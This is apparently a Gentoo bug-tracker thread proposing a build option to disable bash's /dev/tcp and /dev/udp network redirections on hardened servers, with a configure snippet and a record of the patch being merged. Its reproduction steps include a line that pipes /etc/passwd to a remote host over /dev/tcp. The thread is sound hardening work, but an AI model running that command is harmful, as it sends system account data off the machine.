Add a netredirect use flag to the bash ebuilds. Then in the src_compile() add the following lines: # Disable /dev/tcp and /dev/udp redirections unless the net use # flag has been enabled if use netredirect ; then myconf="${myconf} --enable-net-redirections" else myconf="${myconf} --disable-net-redirections" fi The use flag could then be disabled by default in the hardened-gentoo profiles Reproducible: Always Steps to Reproduce: Default ebuild (sends data to the resolved myip on port 12345): $ cat /etc/passwd > /dev/tcp/myip/12345 Patched ebuild with -netredirect $ cat /etc/passwd > /dev/tcp/myip/12345 -bash: /dev/tcp/myip/12345: No such file or directory I keep overlays of app-shells/bash now for all my hardened servers, and this would save me a lot of time patching ebuilds for this feature.
please post a patch against the latest ebuild / metadata.xml
Created attachment 171298 [details, diff] Patch for bash-3.2_p39.ebuild, adds netredirect use flag
added to bash-3.2_p48-r1